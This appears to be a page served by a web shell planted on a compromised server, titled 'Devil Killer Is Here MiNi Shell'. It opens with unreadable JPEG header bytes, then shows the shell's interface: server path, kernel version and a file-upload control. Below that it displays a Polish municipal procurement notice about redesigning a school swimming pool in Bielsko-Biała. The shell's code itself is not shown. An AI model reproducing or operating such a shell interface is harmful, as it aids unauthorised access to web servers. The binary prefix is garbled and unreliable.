JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211118/0027367802-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Oprac. pełnozakresowej, pełnobranżowej i kompletnej dok. proj-koszt opisującej w pełnej probl. przebudowę basenu w SP nr 37 przy ul. Doliny Miętusiej 5 w B-B wraz z pełnieniem nadzoru autorskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Bielsko-Biała Urząd Miejski w Bielsku-Białej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 072181741</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Ratuszowy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bielsko-Biała</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@um.bielsko-biala.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.um.bielsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Oprac. pełnozakresowej, pełnobranżowej i kompletnej dok. proj-koszt opisującej w pełnej probl. przebudowę basenu w SP nr 37 przy ul. Doliny Miętusiej 5 w B-B wraz z pełnieniem nadzoru autorskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0ac18a50-4842-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00273678</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000766/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.68 opracowanie pełnozakresowej, pełnobranżowej dokumentacji projektowo-kosztorysowej przebudowy basenu wraz z zapleczem sanitarno-szatniowym w bud. Szkoły nr 37 przy ul. Doliny Miętusiej 5</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0ac18a50-4842-11ec-8c2d-66c2f1230e9c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umbielsko.logintrade.net/rejestracja/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wpostępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywasię przy użyciu Platformy do elektronicznej obsługi zamówień (zwanej dalej: „Platformą”) dostępnej podadresem: www.um-bielsko.logintrade.net/rejestracja/ oraz poczty elektronicznej<br/>zp@um.bielsko.pl lub m.wanat@um.bielsko.pl2. Osobą uprawnioną do komunikowania się z Wykonawcami jest: Wojciech Magiera – Inspektor w Wydziale Zamówień Publicznych (tel. 33 4971 855,<br/>adres e-mail: wojciech.magiera@um.bielsko-biala.pl 3. Wykonawca zamierzający wziąć udział w postępowaniu o udzieleniezamówienia publicznego, musi posiadać konto na Platformie. Wykonawca posiadający konto naPlatformie ma możliwość złożenia, wycofania oferty oraz składania wniosków o wyjaśnienie<br/>treściSWZ. 4. Wymagania techniczne i organizacyjne wysyłania i odbierania przekazania przedmiotowychśrodków dowodowych, podmiotowych środków dowodowych oraz innych oświadczeń i dokumentówprzy ich użyciu zostały opisane poniżej:1) Do połączenia używany jest szyfrowany protokół<br/>HTTPS.Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufnośćtransmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie ma dostępdo możliwości złożenia, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytańdo treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach. Dopuszczalneprzeglądarki internetowe: Internet Explorer 10 i nowsze, Edge Google Chrome Mozilla FirefoxOperaPozostałe wymagania techniczne: dostęp do sieci internet obsługa przez przeglądarkę protokołuXMLHttpRequest - ajax włączona obsługa JavaScript zalecana szybkość łącza internetowego powyżej500 KB/s zainstalowany Acrobat Reader zainstalowane środowisko uruchomieniowe Java - Java SERuntime Environment 6 Update 24 lub nowszy Maksymalny rozmiar plików przesyłanych zapośrednictwem Platformy wynosi 150 MB.6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ustawy Pzp, przedmiotowych środków dowodowych, podmiotowych środków dowodowych.Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Robotybudowlane oraz innych oświadczeń i dokumentów przyjmuje się datę ich wpływu na Platformę, a nie datę wykonania danej czynności przez Wykonawcę na Platformie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1-3 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) – zwanego dalej „RODO”,<br/>zamawiający jako administrator danych osobowych wypełnia obowiązek informacyjny związany ze<br/>zbieraniem danych osobowych bezpośrednio od osób fizycznych, których dane dotyczą, w celu<br/>związanym z nin. postępowaniem o udzielenie zamówienia publicznego, informując wykonawcę, że: a)<br/>administratorem Pani/Pana danych osobowych jest Miasto Bielsko-Biała reprezentowane przez<br/>Prezydenta Miasta B-B, adres: UM w B-B, pl. Ratuszowy 1, 43-300 B-B, tel. 33 4971 851; b) w Mieście<br/>B-B UM w Bielsku-Białej powołany został inspektor ochrony danych osobowych, dane kontaktowe: tel.<br/>33 4971 721, adres e-mail: iod@um.bielsko.pl;c) Pani/Pana dane osobowe przetwarzane będą na<br/>podstawie art. 6 ust. 1 lit. c RODO, w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego na realizację zadania pn. Budowa przedszkola przy ul. Janowickiej i ul. Jakuba<br/>Jasińskiego, znak sprawy: ZP.271.2.35.2021.MW, d)odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania; e)Pani/Pana dane<br/>osobowe będą przechowywane przez okres dwóch lat od dnia 31 grudnia następującego po złożeniu<br/>zestawienia wydatków Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-<br/>2020 do Komisji Europejskiej, w którym ujęto ostateczne wydatki dotyczące zakończenia projektu (art.<br/>140 rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 1303/2013 z dnia 17 grudnia 2013 r.),<br/>bez uszczerbku dla zasad regulujących pomoc państwa oraz krajowych przepisów dotyczących<br/>archiwizacji dokumentów; f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio<br/>Pani/Pana dotyczących jest wymogiem ustawowym, określonym w przepisach ustawy Pzp, związanym<br/>z udziałem w nin. postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp; g)w odniesieniu do Pani/Pana danych osobowych decyzje<br/>nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO; h) posiada Pani/Pan:<br/>na podstawie art. 15 RODO, prawo dostępu do danych osobowych Pani/Pana dotyczących, Uwaga: W<br/>przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO, wymagałoby<br/>niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego. W przypadku gdy wykonanie obowiązków, o<br/>których mowa w art. 15 ust. 1-3 RODO, wymagałoby niewspółmiernie dużego wysiłku, zamawiający<br/>może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w<br/>szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia.-na podstawie art. 16 RODO, prawo do sprostowania Pani/Pana danych osobowych,<br/>Uwaga: Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia danych osobowych, o których mowa w art. 16 RODO, nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego, ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do<br/>sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może naruszać integralności<br/>protokołu oraz jego załączników. -na podstawie art. 18 RODO, prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>RODO, Uwaga: Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1<br/>RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania oudzielenie zamówienia publicznego.- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>naruszaprzepisy RODO,i) nie przysługuje Pani/Panu:- w związku z art. 17 ust. 3 lit. b, d lub e RODO,<br/>prawo do<br/>usunięcia danych osobowych,- prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>RODO,- na podstawie art. 21 RODO, prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.2)<br/>Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO, w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w Dziale VI ustawy Pzp, do upływu terminu<br/>do ich wniesienia.3) Zamawiający przetwarza dane osobowe zebrane w nin. postępowaniu o udzielenie<br/>zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym<br/>rozpowszechnianiem.4) Do przetwarzania danych osobowych, o których mowa w art. 10 RODO, mogą<br/>być dopuszczone wyłącznie osoby posiadające pisemne upoważnienie. Osoby dopuszczone do<br/>przetwarzania takich danych są obowiązane do zachowania ich w poufności.5) W przypadku danych<br/>osobowych zamieszczonych przez zamawiającego w Biuletynie Zamówień Publicznych, prawa, o<br/>których mowa w art. 15 i art. 16 RODO, są wykonywane w drodze żądania skierowanego do<br/>zamawiającego.6) Ponadto zamawiający informuje, że zgodnie z art. 13 RODO, w zamówieniach<br/>publicznych administratorem danych osobowych, obowiązanym do spełnienia obowiązku<br/>informacyjnego, jest również w szczególności:a) wykonawca – względem osób fizycznych, od których<br/>dane osobowe bezpośrednio pozyskał. Dotyczy to w szczególności:- osoby fizycznej skierowanej do<br/>realizacji zamówienia,- podwykonawcy/ podmiotu trzeciego będącego osobą fizyczną,-<br/>podwykonawcy/podmiotu trzeciego będącego osobą fizyczną, prowadzącą jednoosobową działalność<br/>gospodarczą,- pełnomocnika podwykonawcy/ podmiotu trzeciego będącego osobą fizyczną (np. dane<br/>osobowe zamieszczone w pełnomocnictwie),- członka organu zarządzającego podwykonawcy/<br/>podmiotu trzeciego, będącego osobą fizyczną (np. dane osobowe zamieszczone w informacji z KRK);<br/>b) podwykonawca/ podmiot trzeci – względem osób fizycznych, od których dane osobowe<br/>bezpośrednio pozyskał – dotyczy to w szczególności osoby fizycznej skierowanej do realizacji<br/>zamówienia.7)<br/>Wykonawca ubiegający się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia<br/>wszystkich obowiązków formalno-prawnych związanych z udziałem w nin. postępowaniu. Do<br/>obowiązków tych należą m.in. obowiązki wynikające z RODO, w szczególności obowiązek<br/>informacyjny, przewidziany w art. 13 RODO, względem osób fizycznych, których dane osobowe<br/>dotyczą i od których dane te wykonawca bezpośrednio pozyskał. Jednakże obowiązek informacyjny,<br/>wynikający z art. 13 RODO, nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna,<br/>której dane dotyczą, dysponuje już tymi informacjami, zgodnie z art. 13 ust. 4 RODO.8) Ponadto<br/>wykonawca będzie musiał wypełnić obowiązek informacyjny, wynikający z art. 14 RODO, względem<br/>osób fizycznych, których dane przekazuje zamawiającemu i których dane pośrednio pozyskał, chyba że<br/>ma zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 RODO.9) W celu<br/>zapewnienia, że wykonawca wypełnił, określone w ppkt. 7 i 8, obowiązki informacyjne oraz ochrony<br/>prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem<br/>wykonawcy w nin. postępowaniu, zobowiązany jest do złożenia w nin. postępowaniu o udzielenie<br/>zamówienia publicznego oświadczenia o wypełnieniu przez niego obowiązków informacyjnych<br/>przewidzianych w art. 13 lub art. 14 RODO – wg wzoru stanowiącego Załącznik nr 1a do nin. SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.113.2021.WM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: „Opracowanie pełnozakresowej, pełnobranżowej i kompletnej dokumentacji projektowo-kosztorysowej opisującej w pełnej problematyce przebudowę basenu szkolnego w budynku Szkoły Podstawowej nr 37 przy ul. Doliny Miętusiej 5 w Bielsku-Białej wraz z pełnieniem nadzoru autorskiego”, zwanej dalej Dokumentacją.<br/>Prace projektowe wymagają uwzględnienia w zakresie Dokumentacji zagadnień mających na celu w szczególności:<br/>a)	spełnienie wymagań zawartych w decyzjach Państwowego Powiatowego Inspektora Sanitarnego (znak ONS-HKiŚ.431.21.2020 z dnia 08.03.2020 i z dnia 11.12.2020 r. – w załączeniu),<br/>b)	maksymalne pogłębienie niecki basenu z zastrzeżeniem braku możliwości ingerencji w konstrukcję obiektu. W trakcie prac projektowych wykonawca podda możliwość pogłębienia niecki analizie i zaproponuje możliwe rozwiązania (proponuje się np. pogłębienie poprzez wymianę warstw podłoża lub wyniesienie plaży pomieszczenia niecki basenu celem uzyskania głębszej niecki). <br/>c)	przebudowę niecki basenu wraz z pozostałymi brodzikami celem wykonania niecek ze stali nierdzewnej, <br/>d)	kompleksową przebudowę części basenowej budynku wraz z podbaseniem w piwnicy zapewniając bezawaryjność wszystkich systemów i urządzeń, <br/>e)	wykonanie nowych instalacji wewnętrznych wszystkich branż wraz z montażem urządzeń zapewniających użytkowanie basenu bezobsługowo wg obowiązujących standardów, <br/>f)	przebudowę układów technologii uzdatniania wody basenowej,<br/>g)	rozbudowę lub przebudowę instalacji elektrycznych, w tym: oświetlenia awaryjnego i instalacji wykrywania pożaru w pomieszczeniach objętych opracowaniem zgodnie z obowiązującymi przepisami,<br/>h)	przebudowę zaplecza szatniowo-sanitarnego wraz z dostosowaniem do obowiązujących przepisów, <br/>i)	utworzenie wymaganych przepisami pomieszczeń niezbędnych dla obiektów tego typu, <br/>j)	realizację prac projektowych z poszanowaniem potrzeb wszystkich użytkowników w tym osób niepełnosprawnych, <br/>k)	przebudowę sieci i przyłączy wraz z ewentualnymi urządzeniami w zakresie koniecznym do prawidłowego i bezawaryjnego funkcjonowania tej części obiektu, przebudowę lub rozbudowę węzła cieplnego (jeżeli konieczne),<br/>l)	przeprowadzenie koniecznych prac termoizolacyjnych tzw. wynikowych związanych z tą częścią obiektu. Miasto w ostatnich latach przeprowadziło termomodernizację budynku w ramach dofinansowania ze środków zewnętrznych, z uwagi na okres trwałości projektu wymaga się odtworzenia prac objętych dofinansowaniem jeżeli będzie konieczność ingerencji w tą część obiektu. <br/>m)	zastosowanie rozwiązań, systemów lub urządzeń umożliwiających wprowadzenie realnych oszczędności w eksploatacji tej części obiektu po modernizacji liczonej w okresie maksymalnie 20 lat. Odniesieniem stanu wyjściowego powinny być standardowe rozwiązania a nie stan istniejący. <br/>2.	Przedmiot zamówienia opisany jest szczegółowo w SWZ oraz niżej wymienionych załącznikach, tj. w: <br/>	załączniku nr 6 do SWZ - Opis przedmiotu zamówienia,<br/>	załączniku nr 6a do SWZ – Dokumentacja fotograficzna,<br/>	załączniku nr 6b do SWZ – Kopia rzutu kondygnacji parteru budynku z oznaczeniem lokalizacji części basenowej,<br/>	załączniku nr 6c - Kopie decyzji Państwowego Powiatowego Inspektora Sanitarnego,<br/>	załączniku nr 5 – Wzór umowy.<br/>Wszystkie wymienione wyżej załączniki opublikowane są na stronie internetowej Zamawiającego w formie elektronicznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie projektatna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">konkursy projektowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca spełni warunek na poziomie minimalnym, jeżeli wykaże, że:<br/>a)	wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie:<br/>	co najmniej 1 (jedną) dokumentację projektową wielobranżową, obejmującą budowę, przebudowę lub rozbudowę obiektu o kubaturze co najmniej 1200 m3 wraz z budową lub przebudową instalacji uzdatniania wody.;<br/>Poprzez dokumentację projektową należy rozumieć opracowanie projektu budowlanego i wykonawczego lub projektu budowlanego z elementami projektu 